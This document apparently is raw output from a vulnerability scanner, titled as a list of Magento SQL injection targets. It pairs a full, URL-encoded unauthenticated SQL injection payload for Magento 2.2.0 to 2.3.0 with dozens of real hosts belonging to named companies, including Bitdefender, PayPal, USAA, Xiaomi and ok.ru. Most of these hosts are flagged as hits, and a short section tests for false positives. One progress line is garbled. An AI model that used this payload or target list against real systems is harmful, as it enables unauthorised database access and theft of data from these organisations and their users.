# MAGENTO SQLi TARGETS ### Test false positives A) https://a004bucgts.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- B) https://a004bucgts.kdn.bitdefender.net/catalog2/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- ### TARGETS [INF] Waiting for your terminal to settle.. [INF] [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] Loaded template MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI (@Tink2hack & nathanxa) [Critical] [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://a004bucgts.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://a005bucgts.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://a002bucgts.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] 
https://a002nviamz.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://a003bucgts.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://a020bucgts.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://a021bucgts.kdn.bitdefender.net/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://staging-wopi.files.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://angry.flocktory.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [1 template, 122032 AGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] 
https://mock.lob.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://hybrid.miui.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://cc.sys.miui.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tamtam-lp-pc2.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tamtam-lp-dc2.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tamtam-lp-kc1.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] 
https://tamtam-lp-pc1.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tamtam-lp-dc1.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tamtam-lp-kc2.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://api-messages-ws.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tamtam-ws.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://tgproxy2.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] 
https://tamtam-lp.ok.ru/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://adjvendor.paypal.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://testproxy.tamtam.chat/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://ws.tamtam.chat/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://testproxy2.tamtam.chat/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://san.usaa.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] 
https://reviews.usaa.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://answers.usaa.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://aklogsqa.usaa.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://markets.usaa.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://at.usaa.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://extlgs.usaa.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] 
https://extranet.c3.miui-l7-miuiauto.tflctwn2t6.elb.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://extranet.c3.miui-l7-feedback.1irknwwveg.elb.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://extranet.c3.miui-l7-miuiauto.0bdzkgvi8u.elb.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://hybrid.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://extranet.c4.miui-l7-miuiauto.bcmmezkwb9.elb.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://activity.hybrid.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 
UNAUTHENTICATED SQLI] [http] https://extranet.ap-southeast-1.miui-l7-bsp-jupiter.uvcsoawjky.elb.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20- [MAGENTO 2.2.0 <= 2.3.0 UNAUTHENTICATED SQLI] [http] https://extranet.c4.miui-l7-bsp-jupiter.ulwpesb1sj.elb.xiaomi.com/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=?&ids[0][product_id][to]=)))%%20OR%%20(SELECT%%201%%20UNION%%20SELECT%%202%%20FROM%%20DUAL%%20WHERE%%201=0)%%20--%%20-